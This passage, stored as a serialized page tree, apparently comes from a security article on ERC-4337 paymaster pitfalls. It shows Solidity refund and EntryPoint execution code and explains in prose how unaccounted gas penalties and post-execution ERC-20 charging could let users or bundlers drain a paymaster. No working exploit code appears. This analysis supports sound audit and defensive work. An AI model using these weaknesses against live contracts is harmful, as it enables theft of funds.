(",{"type":27,"tag":207,"props":111165,"children":111166},{"style":8920},[111167],{"type":33,"value":53410},{"type":27,"tag":207,"props":111169,"children":111170},{"style":238},[111171],{"type":33,"value":1123},{"type":27,"tag":207,"props":111173,"children":111174},{"style":8920},[111175],{"type":33,"value":39898},{"type":27,"tag":207,"props":111177,"children":111178},{"style":238},[111179],{"type":33,"value":14505},{"type":27,"tag":207,"props":111181,"children":111182},{"class":209,"line":8090},[111183,111188,111193,111198],{"type":27,"tag":207,"props":111184,"children":111185},{"style":238},[111186],{"type":33,"value":111187}," preCharge ",{"type":27,"tag":207,"props":111189,"children":111190},{"style":226},[111191],{"type":33,"value":111192},"-=",{"type":27,"tag":207,"props":111194,"children":111195},{"style":238},[111196],{"type":33,"value":111197}," baseFee; ",{"type":27,"tag":207,"props":111199,"children":111200},{"style":4647},[111201],{"type":33,"value":111202},"// don't refund the base fee\n",{"type":27,"tag":207,"props":111204,"children":111205},{"class":209,"line":8098},[111206,111210,111215,111219,111224,111228,111232],{"type":27,"tag":207,"props":111207,"children":111208},{"style":8920},[111209],{"type":33,"value":110335},{"type":27,"tag":207,"props":111211,"children":111212},{"style":238},[111213],{"type":33,"value":111214}," _cachedPrice ",{"type":27,"tag":207,"props":111216,"children":111217},{"style":226},[111218],{"type":33,"value":10380},{"type":27,"tag":207,"props":111220,"children":111221},{"style":1335},[111222],{"type":33,"value":111223}," updateCachedPrice",{"type":27,"tag":207,"props":111225,"children":111226},{"style":238},[111227],{"type":33,"value":1343},{"type":27,"tag":207,"props":111229,"children":111230},{"style":214},[111231],{"type":33,"value":15456},{"type":27,"tag":207,"props":111233,"children":111234},{"style":238},[111235],{"type":33,"value":1455},{"type":27,"tag":207,"props":111237,"children":111238},{"class":209,"line":8107},[111239,111243,111247],{"type":27,"tag":207,"props":111240,"children":111241},{"style":4647},[111242],{"type":33,"value":110587},{"type":27,"tag":207,"props":111244,"children":111245},{"style":214},[111246],{"type":33,"value":73992},{"type":27,"tag":207,"props":111248,"children":111249},{"style":4647},[111250],{"type":33,"value":110596},{"type":27,"tag":207,"props":111252,"children":111253},{"class":209,"line":8116},[111254,111258,111262,111266,111270,111274,111278,111282],{"type":27,"tag":207,"props":111255,"children":111256},{"style":8920},[111257],{"type":33,"value":110335},{"type":27,"tag":207,"props":111259,"children":111260},{"style":238},[111261],{"type":33,"value":110608},{"type":27,"tag":207,"props":111263,"children":111264},{"style":226},[111265],{"type":33,"value":10380},{"type":27,"tag":207,"props":111267,"children":111268},{"style":238},[111269],{"type":33,"value":111214},{"type":27,"tag":207,"props":111271,"children":111272},{"style":226},[111273],{"type":33,"value":9286},{"type":27,"tag":207,"props":111275,"children":111276},{"style":238},[111277],{"type":33,"value":110626},{"type":27,"tag":207,"props":111279,"children":111280},{"style":226},[111281],{"type":33,"value":980},{"type":27,"tag":207,"props":111283,"children":111284},{"style":238},[111285],{"type":33,"value":110635},{"type":27,"tag":207,"props":111287,"children":111288},{"class":209,"line":8125},[111289],{"type":27,"tag":207,"props":111290,"children":111291},{"style":4647},[111292],{"type":33,"value":111293}," // Refund tokens based on actual gas cost\n",{"type":27,"tag":207,"props":111295,"children":111296},{"class":209,"line":8133},[111297,111301,111306,111310,111315,111319,111324,111328],{"type":27,"tag":207,"props":111298,"children":111299},{"style":8920},[111300],{"type":33,"value":110335},{"type":27,"tag":207,"props":111302,"children":111303},{"style":238},[111304],{"type":33,"value":111305}," actualChargeNative ",{"type":27,"tag":207,"props":111307,"children":111308},{"style":226},[111309],{"type":33,"value":10380},{"type":27,"tag":207,"props":111311,"children":111312},{"style":238},[111313],{"type":33,"value":111314}," actualGasCost ",{"type":27,"tag":207,"props":111316,"children":111317},{"style":226},[111318],{"type":33,"value":2227},{"type":27,"tag":207,"props":111320,"children":111321},{"style":238},[111322],{"type":33,"value":111323}," tokenPaymasterConfig.refundPostopCost ",{"type":27,"tag":207,"props":111325,"children":111326},{"style":226},[111327],{"type":33,"value":9286},{"type":27,"tag":207,"props":111329,"children":111330},{"style":238},[111331],{"type":33,"value":111332}," actualUserOpFeePerGas;\n",{"type":27,"tag":207,"props":111334,"children":111335},{"class":209,"line":8142},[111336,111340,111345,111349,111353],{"type":27,"tag":207,"props":111337,"children":111338},{"style":8920},[111339],{"type":33,"value":110335},{"type":27,"tag":207,"props":111341,"children":111342},{"style":238},[111343],{"type":33,"value":111344}," actualTokenNeeded ",{"type":27,"tag":207,"props":111346,"children":111347},{"style":226},[111348],{"type":33,"value":10380},{"type":27,"tag":207,"props":111350,"children":111351},{"style":1335},[111352],{"type":33,"value":110810},{"type":27,"tag":207,"props":111354,"children":111355},{"style":238},[111356],{"type":33,"value":111357},"(actualChargeNative, cachedPriceWithMarkup);\n",{"type":27,"tag":207,"props":111359,"children":111360},{"class":209,"line":8151},[111361,111365,111370,111374],{"type":27,"tag":207,"props":111362,"children":111363},{"style":376},[111364],{"type":33,"value":66034},{"type":27,"tag":207,"props":111366,"children":111367},{"style":238},[111368],{"type":33,"value":111369}," (preCharge ",{"type":27,"tag":207,"props":111371,"children":111372},{"style":226},[111373],{"type":33,"value":17739},{"type":27,"tag":207,"props":111375,"children":111376},{"style":238},[111377],{"type":33,"value":111378}," actualTokenNeeded) {\n",{"type":27,"tag":207,"props":111380,"children":111381},{"class":209,"line":8160},[111382],{"type":27,"tag":207,"props":111383,"children":111384},{"style":4647},[111385],{"type":33,"value":111386}," // If initially provided token amount is greater than the actual amount needed, refund the difference\n",{"type":27,"tag":207,"props":111388,"children":111389},{"class":209,"line":8169},[111390,111395,111400,111405,111409],{"type":27,"tag":207,"props":111391,"children":111392},{"style":238},[111393],{"type":33,"value":111394}," SafeERC20.",{"type":27,"tag":207,"props":111396,"children":111397},{"style":1335},[111398],{"type":33,"value":111399},"safeTransfer",{"type":27,"tag":207,"props":111401,"children":111402},{"style":238},[111403],{"type":33,"value":111404},"(token, userOpSender, preCharge ",{"type":27,"tag":207,"props":111406,"children":111407},{"style":226},[111408],{"type":33,"value":11611},{"type":27,"tag":207,"props":111410,"children":111411},{"style":238},[111412],{"type":33,"value":111413}," actualTokenNeeded);\n",{"type":27,"tag":207,"props":111415,"children":111416},{"class":209,"line":8177},[111417,111421,111425,111429,111433,111437],{"type":27,"tag":207,"props":111418,"children":111419},{"style":238},[111420],{"type":33,"value":77827},{"type":27,"tag":207,"props":111422,"children":111423},{"style":376},[111424],{"type":33,"value":10605},{"type":27,"tag":207,"props":111426,"children":111427},{"style":376},[111428],{"type":33,"value":23063},{"type":27,"tag":207,"props":111430,"children":111431},{"style":238},[111432],{"type":33,"value":111369},{"type":27,"tag":207,"props":111434,"children":111435},{"style":226},[111436],{"type":33,"value":9257},{"type":27,"tag":207,"props":111438,"children":111439},{"style":238},[111440],{"type":33,"value":111378},{"type":27,"tag":207,"props":111442,"children":111443},{"class":209,"line":8185},[111444],{"type":27,"tag":207,"props":111445,"children":111446},{"style":4647},[111447],{"type":33,"value":111448}," // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n",{"type":27,"tag":207,"props":111450,"children":111451},{"class":209,"line":8194},[111452],{"type":27,"tag":207,"props":111453,"children":111454},{"style":4647},[111455],{"type":33,"value":111456}," // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n",{"type":27,"tag":207,"props":111458,"children":111459},{"class":209,"line":9933},[111460,111464,111468,111473,111477,111481,111485,111490,111494],{"type":27,"tag":207,"props":111461,"children":111462},{"style":238},[111463],{"type":33,"value":111394},{"type":27,"tag":207,"props":111465,"children":111466},{"style":1335},[111467],{"type":33,"value":110845},{"type":27,"tag":207,"props":111469,"children":111470},{"style":238},[111471],{"type":33,"value":111472},"(token, userOpSender, ",{"type":27,"tag":207,"props":111474,"children":111475},{"style":8920},[111476],{"type":33,"value":39898},{"type":27,"tag":207,"props":111478,"children":111479},{"style":238},[111480],{"type":33,"value":1343},{"type":27,"tag":207,"props":111482,"children":111483},{"style":214},[111484],{"type":33,"value":24964},{"type":27,"tag":207,"props":111486,"children":111487},{"style":238},[111488],{"type":33,"value":111489},"), actualTokenNeeded ",{"type":27,"tag":207,"props":111491,"children":111492},{"style":226},[111493],{"type":33,"value":11611},{"type":27,"tag":207,"props":111495,"children":111496},{"style":238},[111497],{"type":33,"value":111498}," preCharge);\n",{"type":27,"tag":207,"props":111500,"children":111501},{"class":209,"line":9941},[111502],{"type":27,"tag":207,"props":111503,"children":111504},{"style":238},[111505],{"type":33,"value":66118},{"type":27,"tag":207,"props":111507,"children":111508},{"class":209,"line":9950},[111509],{"type":27,"tag":207,"props":111510,"children":111511},{"emptyLinePlaceholder":19},[111512],{"type":33,"value":2062},{"type":27,"tag":207,"props":111514,"children":111515},{"class":209,"line":9959},[111516,111520,111525,111529,111533],{"type":27,"tag":207,"props":111517,"children":111518},{"style":376},[111519],{"type":33,"value":66034},{"type":27,"tag":207,"props":111521,"children":111522},{"style":238},[111523],{"type":33,"value":111524}," (baseFee ",{"type":27,"tag":207,"props":111526,"children":111527},{"style":226},[111528],{"type":33,"value":17739},{"type":27,"tag":207,"props":111530,"children":111531},{"style":232},[111532],{"type":33,"value":4680},{"type":27,"tag":207,"props":111534,"children":111535},{"style":238},[111536],{"type":33,"value":1424},{"type":27,"tag":207,"props":111538,"children":111539},{"class":209,"line":9968},[111540,111544,111548],{"type":27,"tag":207,"props":111541,"children":111542},{"style":238},[111543],{"type":33,"value":111394},{"type":27,"tag":207,"props":111545,"children":111546},{"style":1335},[111547],{"type":33,"value":111399},{"type":27,"tag":207,"props":111549,"children":111550},{"style":238},[111551],{"type":33,"value":111552},"(token, tokenPaymasterConfig.rewardsPool, baseFee);\n",{"type":27,"tag":207,"props":111554,"children":111555},{"class":209,"line":9977},[111556],{"type":27,"tag":207,"props":111557,"children":111558},{"style":238},[111559],{"type":33,"value":66118},{"type":27,"tag":207,"props":111561,"children":111562},{"class":209,"line":9985},[111563],{"type":27,"tag":207,"props":111564,"children":111565},{"emptyLinePlaceholder":19},[111566],{"type":33,"value":2062},{"type":27,"tag":207,"props":111568,"children":111569},{"class":209,"line":9994},[111570,111575,111580],{"type":27,"tag":207,"props":111571,"children":111572},{"style":376},[111573],{"type":33,"value":111574}," emit",{"type":27,"tag":207,"props":111576,"children":111577},{"style":1335},[111578],{"type":33,"value":111579}," UserOperationSponsored",{"type":27,"tag":207,"props":111581,"children":111582},{"style":238},[111583],{"type":33,"value":111584},"(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n",{"type":27,"tag":207,"props":111586,"children":111587},{"class":209,"line":10002},[111588,111593],{"type":27,"tag":207,"props":111589,"children":111590},{"style":1335},[111591],{"type":33,"value":111592}," refillEntryPointDeposit",{"type":27,"tag":207,"props":111594,"children":111595},{"style":238},[111596],{"type":33,"value":111597},"(_cachedPrice);\n",{"type":27,"tag":207,"props":111599,"children":111600},{"class":209,"line":10010},[111601],{"type":27,"tag":207,"props":111602,"children":111603},{"style":238},[111604],{"type":33,"value":10637},{"type":27,"tag":207,"props":111606,"children":111607},{"class":209,"line":10019},[111608],{"type":27,"tag":207,"props":111609,"children":111610},{"style":238},[111611],{"type":33,"value":10645},{"type":27,"tag":207,"props":111613,"children":111614},{"class":209,"line":10028},[111615],{"type":27,"tag":207,"props":111616,"children":111617},{"style":238},[111618],{"type":33,"value":451},{"type":27,"tag":36,"props":111620,"children":111621},{},[111622,111624,111630,111632,111637,111639,111645],{"type":33,"value":111623},"Looking at the code above, during ",{"type":27,"tag":84,"props":111625,"children":111627},{"className":111626},[],[111628],{"type":33,"value":111629},"validatePaymasterUserOp",{"type":33,"value":111631},", the paymaster attempts to charge a maximum prefund amount first. This prefund is calculated by taking the gas limit specified in the ",{"type":27,"tag":84,"props":111633,"children":111635},{"className":111634},[],[111636],{"type":33,"value":109690},{"type":33,"value":111638}," and applying a markup price to convert the native ETH cost into the equivalent ERC20-token value. Later in ",{"type":27,"tag":84,"props":111640,"children":111642},{"className":111641},[],[111643],{"type":33,"value":111644},"postOp",{"type":33,"value":111646},", the paymaster calculates the actual charge and refunds any excess from the prefund.",{"type":27,"tag":36,"props":111648,"children":111649},{},[111650,111652,111657,111659,111666],{"type":33,"value":111651},"However, there is a critical oversight: ",{"type":27,"tag":12606,"props":111653,"children":111654},{},[111655],{"type":33,"value":111656},"the code does not account for gas penalties",{"type":33,"value":111658},". The actual gas charged to the paymaster includes not just the gas used, but also any ",{"type":27,"tag":47,"props":111660,"children":111663},{"href":111661,"rel":111662},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L726-L730",[51],[111664],{"type":33,"value":111665},"penalties incurred",{"type":33,"value":111667}," from differences between the execution gas limit and actual execution gas.",{"type":27,"tag":36,"props":111669,"children":111670},{},[111671],{"type":33,"value":111672},"This vulnerability can be exploited by malicious users who set an artificially high gas limit to trigger the penalty. When penalties are applied, the paymaster will be charged significantly more than expected, potentially draining its funds since these additional costs were not factored into the calculation.",{"type":27,"tag":36,"props":111674,"children":111675},{},[111676,111678,111683],{"type":33,"value":111677},"In fact, the bundler will be the one who receives the penalty paid by the paymaster. This means a bundler could submit their own ",{"type":27,"tag":84,"props":111679,"children":111681},{"className":111680},[],[111682],{"type":33,"value":109389},{"type":33,"value":111684}," to be executed by themselves and profit if the penalty they can extract from the paymaster exceeds their own gas costs paid to the paymaster. In SEND's case, fortunately, because they operate their own bundler, any penalties incurred flow back to their controlled bundler, creating a closed economic loop that mitigates this particular attack vector.",{"type":27,"tag":28,"props":111686,"children":111688},{"id":111687},"incorrect-erc-20-handling",[111689],{"type":27,"tag":12606,"props":111690,"children":111691},{},[111692],{"type":33,"value":111693},"Incorrect ERC-20 Handling",{"type":27,"tag":36,"props":111695,"children":111696},{},[111697],{"type":33,"value":111698},"To improve user experience, some protocols introduced ERC-20 paymasters that allow users to pay transaction gas fees using ERC-20 tokens instead of native ETH (Just like what SEND did in the above code). The core concept is quite straightforward, the paymaster fronts the ETH gas costs to bundlers, then charges users an equivalent amount in ERC-20 tokens based on current market rates. However, implementing this token-to-ETH conversion and payment flow securely requires careful consideration.",{"type":27,"tag":36,"props":111700,"children":111701},{},[111702,111703,111708,111710,111715],{"type":33,"value":52538},{"type":27,"tag":84,"props":111704,"children":111706},{"className":111705},[],[111707],{"type":33,"value":109470},{"type":33,"value":111709}," flow above, we can see that paymasters have two key interaction points during a ",{"type":27,"tag":84,"props":111711,"children":111713},{"className":111712},[],[111714],{"type":33,"value":109389},{"type":33,"value":111716},"'s lifecycle:",{"type":27,"tag":12719,"props":111718,"children":111719},{},[111720,111730],{"type":27,"tag":1232,"props":111721,"children":111722},{},[111723,111725],{"type":33,"value":111724},"During validation via ",{"type":27,"tag":84,"props":111726,"children":111728},{"className":111727},[],[111729],{"type":33,"value":109577},{"type":27,"tag":1232,"props":111731,"children":111732},{},[111733,111735],{"type":33,"value":111734},"After execution via ",{"type":27,"tag":84,"props":111736,"children":111738},{"className":111737},[],[111739],{"type":33,"value":109588},{"type":27,"tag":36,"props":111741,"children":111742},{},[111743],{"type":33,"value":111744},"This dual-interaction model has led to two predominant patterns for handling ERC-20 payments in paymaster implementations:",{"type":27,"tag":58,"props":111746,"children":111748},{"id":111747},"_1-pre-payment-with-refund-pattern",[111749],{"type":33,"value":111750},"1. Pre-Payment with Refund Pattern",{"type":27,"tag":36,"props":111752,"children":111753},{},[111754,111756,111761,111763,111768,111770,111776,111777,111783,111785,111790,111792,111797,111799,111804],{"type":33,"value":111755},"In this model, the paymaster requires users to pre-pay the maximum possible gas cost in ERC-20 tokens during ",{"type":27,"tag":84,"props":111757,"children":111759},{"className":111758},[],[111760],{"type":33,"value":109577},{"type":33,"value":111762},". After execution completes, ",{"type":27,"tag":84,"props":111764,"children":111766},{"className":111765},[],[111767],{"type":33,"value":109588},{"type":33,"value":111769}," refunds any excess tokens based on actual gas consumed. This is analogous to how regular ETH gas payments work. Several protocols like ",{"type":27,"tag":84,"props":111771,"children":111773},{"className":111772},[],[111774],{"type":33,"value":111775},"SEND",{"type":33,"value":1131},{"type":27,"tag":84,"props":111778,"children":111780},{"className":111779},[],[111781],{"type":33,"value":111782},"Circle",{"type":33,"value":111784}," have implemented this approach. However, this pattern has one key disadvantage: users must first approve the paymaster to spend their ERC20 tokens before submitting any ",{"type":27,"tag":84,"props":111786,"children":111788},{"className":111787},[],[111789],{"type":33,"value":109418},{"type":33,"value":111791},". This additional setup step is required to ensure the paymaster can successfully deduct tokens ",{"type":27,"tag":12606,"props":111793,"children":111794},{},[111795],{"type":33,"value":111796},"before",{"type":33,"value":111798}," execution (specifically during ",{"type":27,"tag":84,"props":111800,"children":111802},{"className":111801},[],[111803],{"type":33,"value":111629},{"type":33,"value":28014},{"type":27,"tag":58,"props":111806,"children":111808},{"id":111807},"_2-post-execution-charging-pattern",[111809],{"type":33,"value":111810},"2. Post-Execution Charging Pattern",{"type":27,"tag":36,"props":111812,"children":111813},{},[111814,111816,111821,111823,111828,111830,111835,111837,111842],{"type":33,"value":111815},"This alternative approach defers token collection until after execution. Instead of charging a prefund during ",{"type":27,"tag":84,"props":111817,"children":111819},{"className":111818},[],[111820],{"type":33,"value":109577},{"type":33,"value":111822},", the actual token payment is calculated and collected in ",{"type":27,"tag":84,"props":111824,"children":111826},{"className":111825},[],[111827],{"type":33,"value":109588},{"type":33,"value":111829}," based on the exact gas consumed. At first glance, this appears to be the most user-friendly pattern since users can bundle their token approval transaction within the same ",{"type":27,"tag":84,"props":111831,"children":111833},{"className":111832},[],[111834],{"type":33,"value":109389},{"type":33,"value":111836},", eliminating the need for a separate pre-approval transaction before submitting the ",{"type":27,"tag":84,"props":111838,"children":111840},{"className":111839},[],[111841],{"type":33,"value":109690},{"type":33,"value":111843},". This means users could interact with the paymaster without any prior setup.",{"type":27,"tag":36,"props":111845,"children":111846},{},[111847,111849,111854,111856,111862,111864,111870,111872,111877],{"type":33,"value":111848},"This approach used to work in ",{"type":27,"tag":84,"props":111850,"children":111852},{"className":111851},[],[111853],{"type":33,"value":109470},{"type":33,"value":111855}," version ",{"type":27,"tag":84,"props":111857,"children":111859},{"className":111858},[],[111860],{"type":33,"value":111861},"v0.6",{"type":33,"value":111863},", but the pattern no longer works in ",{"type":27,"tag":84,"props":111865,"children":111867},{"className":111866},[],[111868],{"type":33,"value":111869},"v0.7",{"type":33,"value":111871},". In fact, using this pattern can lead to loss of funds for the paymaster. Let's take a closer look at how ",{"type":27,"tag":84,"props":111873,"children":111875},{"className":111874},[],[111876],{"type":33,"value":111869},{"type":33,"value":111878}," handles the execution phase:",{"type":27,"tag":101,"props":111880,"children":111882},{"className":11758,"code":111881,"language":11757,"meta":7,"style":7}," function _executeUserOp(\n uint256 opIndex,\n PackedUserOperation calldata userOp,\n UserOpInfo memory opInfo\n )\n internal virtual\n returns (uint256 collected) {\n [...]\n bool success;\n {\n [...]\n if (methodSig == IAccountExecute.executeUserOp.selector) {\n bytes memory executeUserOp = abi.encodeCall(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n innerCall = abi.encodeCall(this.innerHandleOp, (executeUserOp, opInfo, context));\n } else\n {\n innerCall = abi.encodeCall(this.innerHandleOp, (callData, opInfo, context));\n }\n assembly (\"memory-safe\") {\n success := call(gas(), address(), 0, add(innerCall, 0x20), mload(innerCall), 0, 32)\n collected := mload(0)\n }\n _restoreFreePtr(saveFreePtr);\n }\n if (!success) {\n [...]\n if (innerRevertCode == INNER_OUT_OF_GAS) {\n // handleOps was called with gas limit too low. abort entire bundle.\n // can only be caused by bundler (leaving not enough gas for inner call)\n revert FailedOp(opIndex, \"AA95 out of gas\");\n } else if (innerRevertCode == INNER_REVERT_LOW_PREFUND) {\n // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n uint256 actualGasCost = opInfo.prefund;\n _emitPrefundTooLow(opInfo);\n _emitUserOperationEvent(opInfo, false, actualGasCost, actualGas);\n collected = actualGasCost;\n } else {\n [...]\n collected = _postExecution(\n IPaymaster.PostOpMode.postOpReverted,\n opInfo,\n context,\n actualGas\n );\n }\n }\n }\n",[111883],{"type":27,"tag":84,"props":111884,"children":111885},{"__ignoreMap":7},[111886,111902,111918,111938,111955,111962,111975,111999,112007,112020,112027,112034,112055,112094,112131,112143,112150,112186,112193,112214,112303,112332,112339,112352,112359,112379,112386,112407,112415,112423,112450,112478,112486,112529,112549,112562,112584,112600,112615,112622,112642,112650,112658,112666,112674,112682,112689,112696],{"type":27,"tag":207,"props":111887,"children":111888},{"class":209,"line":210},[111889,111893,111898],{"type":27,"tag":207,"props":111890,"children":111891},{"style":214},[111892],{"type":33,"value":97050},{"type":27,"tag":207,"props":111894,"children":111895},{"style":1335},[111896],{"type":33,"value":111897}," _executeUserOp",{"type":27,"tag":207,"props":111899,"children":111900},{"style":238},[111901],{"type":33,"value":9090},{"type":27,"tag":207,"props":111903,"children":111904},{"class":209,"line":244},[111905,111909,111914],{"type":27,"tag":207,"props":111906,"children":111907},{"style":8920},[111908],{"type":33,"value":97227},{"type":27,"tag":207,"props":111910,"children":111911},{"style":220},[111912],{"type":33,"value":111913}," opIndex",{"type":27,"tag":207,"props":111915,"children":111916},{"style":238},[111917],{"type":33,"value":1842},{"type":27,"tag":207,"props":111919,"children":111920},{"class":209,"line":270},[111921,111926,111930,111934],{"type":27,"tag":207,"props":111922,"children":111923},{"style":214},[111924],{"type":33,"value":111925}," PackedUserOperation",{"type":27,"tag":207,"props":111927,"children":111928},{"style":214},[111929],{"type":33,"value":110219},{"type":27,"tag":207,"props":111931,"children":111932},{"style":220},[111933],{"type":33,"value":110224},{"type":27,"tag":207,"props":111935,"children":111936},{"style":238},[111937],{"type":33,"value":1842},{"type":27,"tag":207,"props":111939,"children":111940},{"class":209,"line":296},[111941,111946,111950],{"type":27,"tag":207,"props":111942,"children":111943},{"style":214},[111944],{"type":33,"value":111945}," UserOpInfo",{"type":27,"tag":207,"props":111947,"children":111948},{"style":214},[111949],{"type":33,"value":110287},{"type":27,"tag":207,"props":111951,"children":111952},{"style":220},[111953],{"type":33,"value":111954}," opInfo\n",{"type":27,"tag":207,"props":111956,"children":111957},{"class":209,"line":445},[111958],{"type":27,"tag":207,"props":111959,"children":111960},{"style":238},[111961],{"type":33,"value":31184},{"type":27,"tag":207,"props":111963,"children":111964},{"class":209,"line":867},[111965,111970],{"type":27,"tag":207,"props":111966,"children":111967},{"style":214},[111968],{"type":33,"value":111969}," internal",{"type":27,"tag":207,"props":111971,"children":111972},{"style":214},[111973],{"type":33,"value":111974}," virtual\n",{"type":27,"tag":207,"props":111976,"children":111977},{"class":209,"line":892},[111978,111982,111986,111990,111995],{"type":27,"tag":207,"props":111979,"children":111980},{"style":376},[111981],{"type":33,"value":53751},{"type":27,"tag":207,"props":111983,"children":111984},{"style":238},[111985],{"type":33,"value":686},{"type":27,"tag":207,"props":111987,"children":111988},{"style":8920},[111989],{"type":33,"value":53410},{"type":27,"tag":207,"props":111991,"children":111992},{"style":220},[111993],{"type":33,"value":111994}," collected",{"type":27,"tag":207,"props":111996,"children":111997},{"style":238},[111998],{"type":33,"value":1424},{"type":27,"tag":207,"props":112000,"children":112001},{"class":209,"line":1475},[112002],{"type":27,"tag":207,"props":112003,"children":112004},{"style":238},[112005],{"type":33,"value":112006}," [...]\n",{"type":27,"tag":207,"props":112008,"children":112009},{"class":209,"line":2065},[112010,112015],{"type":27,"tag":207,"props":112011,"children":112012},{"style":8920},[112013],{"type":33,"value":112014}," bool",{"type":27,"tag":207,"props":112016,"children":112017},{"style":238},[112018],{"type":33,"value":112019}," success;\n",{"type":27,"tag":207,"props":112021,"children":112022},{"class":209,"line":2092},[112023],{"type":27,"tag":207,"props":112024,"children":112025},{"style":238},[112026],{"type":33,"value":38919},{"type":27,"tag":207,"props":112028,"children":112029},{"class":209,"line":2130},[112030],{"type":27,"tag":207,"props":112031,"children":112032},{"style":238},[112033],{"type":33,"value":112006},{"type":27,"tag":207,"props":112035,"children":112036},{"class":209,"line":2168},[112037,112041,112046,112050],{"type":27,"tag":207,"props":112038,"children":112039},{"style":376},[112040],{"type":33,"value":66034},{"type":27,"tag":207,"props":112042,"children":112043},{"style":238},[112044],{"type":33,"value":112045}," (methodSig ",{"type":27,"tag":207,"props":112047,"children":112048},{"style":226},[112049],{"type":33,"value":15856},{"type":27,"tag":207,"props":112051,"children":112052},{"style":238},[112053],{"type":33,"value":112054}," IAccountExecute.executeUserOp.selector) {\n",{"type":27,"tag":207,"props":112056,"children":112057},{"class":209,"line":4095},[112058,112063,112067,112072,112076,112080,112084,112089],{"type":27,"tag":207,"props":112059,"children":112060},{"style":8920},[112061],{"type":33,"value":112062}," bytes",{"type":27,"tag":207,"props":112064,"children":112065},{"style":214},[112066],{"type":33,"value":110287},{"type":27,"tag":207,"props":112068,"children":112069},{"style":238},[112070],{"type":33,"value":112071}," executeUserOp ",{"type":27,"tag":207,"props":112073,"children":112074},{"style":226},[112075],{"type":33,"value":10380},{"type":27,"tag":207,"props":112077,"children":112078},{"style":214},[112079],{"type":33,"value":110884},{"type":27,"tag":207,"props":112081,"children":112082},{"style":238},[112083],{"type":33,"value":1041},{"type":27,"tag":207,"props":112085,"children":112086},{"style":1335},[112087],{"type":33,"value":112088},"encodeCall",{"type":27,"tag":207,"props":112090,"children":112091},{"style":238},[112092],{"type":33,"value":112093},"(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n",{"type":27,"tag":207,"props":112095,"children":112096},{"class":209,"line":4103},[112097,112102,112106,112110,112114,112118,112122,112126],{"type":27,"tag":207,"props":112098,"children":112099},{"style":238},[112100],{"type":33,"value":112101}," innerCall ",{"type":27,"tag":207,"props":112103,"children":112104},{"style":226},[112105],{"type":33,"value":10380},{"type":27,"tag":207,"props":112107,"children":112108},{"style":214},[112109],{"type":33,"value":110884},{"type":27,"tag":207,"props":112111,"children":112112},{"style":238},[112113],{"type":33,"value":1041},{"type":27,"tag":207,"props":112115,"children":112116},{"style":1335},[112117],{"type":33,"value":112088},{"type":27,"tag":207,"props":112119,"children":112120},{"style":238},[112121],{"type":33,"value":1343},{"type":27,"tag":207,"props":112123,"children":112124},{"style":214},[112125],{"type":33,"value":24964},{"type":27,"tag":207,"props":112127,"children":112128},{"style":238},[112129],{"type":33,"value":112130},".innerHandleOp, (executeUserOp, opInfo, context));\n",{"type":27,"tag":207,"props":112132,"children":112133},{"class":209,"line":4154},[112134,112138],{"type":27,"tag":207,"props":112135,"children":112136},{"style":238},[112137],{"type":33,"value":77827},{"type":27,"tag":207,"props":112139,"children":112140},{"style":376},[112141],{"type":33,"value":112142},"else\n",{"type":27,"tag":207,"props":112144,"children":112145},{"class":209,"line":4203},[112146],{"type":27,"tag":207,"props":112147,"children":112148},{"style":238},[112149],{"type":33,"value":38955},{"type":27,"tag":207,"props":112151,"children":112152},{"class":209,"line":4249},[112153,112157,112161,112165,112169,112173,112177,112181],{"type":27,"tag":207,"props":112154,"children":112155},{"style":238},[112156],{"type":33,"value":112101},{"type":27,"tag":207,"props":112158,"children":112159},{"style":226},[112160],{"type":33,"value":10380},{"type":27,"tag":207,"props":112162,"children":112163},{"style":214},[112164],{"type":33,"value":110884},{"type":27,"tag":207,"props":112166,"children":112167},{"style":238},[112168],{"type":33,"value":1041},{"type":27,"tag":207,"props":112170,"children":112171},{"style":1335},[112172],{"type":33,"value":112088},{"type":27,"tag":207,"props":112174,"children":112175},{"style":238},[112176],{"type":33,"value":1343},{"type":27,"tag":207,"props":112178,"children":112179},{"style":214},[112180],{"type":33,"value":24964},{"type":27,"tag":207,"props":112182,"children":112183},{"style":238},[112184],{"type":33,"value":112185},".innerHandleOp, (callData, opInfo, context));\n",{"type":27,"tag":207,"props":112187,"children":112188},{"class":209,"line":4290},[112189],{"type":27,"tag":207,"props":112190,"children":112191},{"style":238},[112192],{"type":33,"value":66118},{"type":27,"tag":207,"props":112194,"children":112195},{"class":209,"line":4304},[112196,112201,112205,112210],{"type":27,"tag":207,"props":112197,"children":112198},{"style":1335},[112199],{"type":33,"value":112200}," assembly",{"type":27,"tag":207,"props":112202,"children":112203},{"style":238},[112204],{"type":33,"value":686},{"type":27,"tag":207,"props":112206,"children":112207},{"style":1325},[112208],{"type":33,"value":112209},"\"memory-safe\"",{"type":27,"tag":207,"props":112211,"children":112212},{"style":238},[112213],{"type":33,"value":1424},{"type":27,"tag":207,"props":112215,"children":112216},{"class":209,"line":5466},[112217,112222,112226,112230,112234,112239,112243,112247,112251,112255,112259,112263,112268,112273,112277,112282,112287,112291,112295,112299],{"type":27,"tag":207,"props":112218,"children":112219},{"style":238},[112220],{"type":33,"value":112221}," success ",{"type":27,"tag":207,"props":112223,"children":112224},{"style":226},[112225],{"type":33,"value":28879},{"type":27,"tag":207,"props":112227,"children":112228},{"style":1335},[112229],{"type":33,"value":48207},{"type":27,"tag":207,"props":112231,"children":112232},{"style":238},[112233],{"type":33,"value":1343},{"type":27,"tag":207,"props":112235,"children":112236},{"style":1335},[112237],{"type":33,"value":112238},"gas",{"type":27,"tag":207,"props":112240,"children":112241},{"style":238},[112242],{"type":33,"value":25646},{"type":27,"tag":207,"props":112244,"children":112245},{"style":8920},[112246],{"type":33,"value":39898},{"type":27,"tag":207,"props":112248,"children":112249},{"style":238},[112250],{"type":33,"value":25646},{"type":27,"tag":207,"props":112252,"children":112253},{"style":232},[112254],{"type":33,"value":1660},{"type":27,"tag":207,"props":112256,"children":112257},{"style":238},[112258],{"type":33,"value":1123},{"type":27,"tag":207,"props":112260,"children":112261},{"style":1335},[112262],{"type":33,"value":16914},{"type":27,"tag":207,"props":112264,"children":112265},{"style":238},[112266],{"type":33,"value":112267},"(i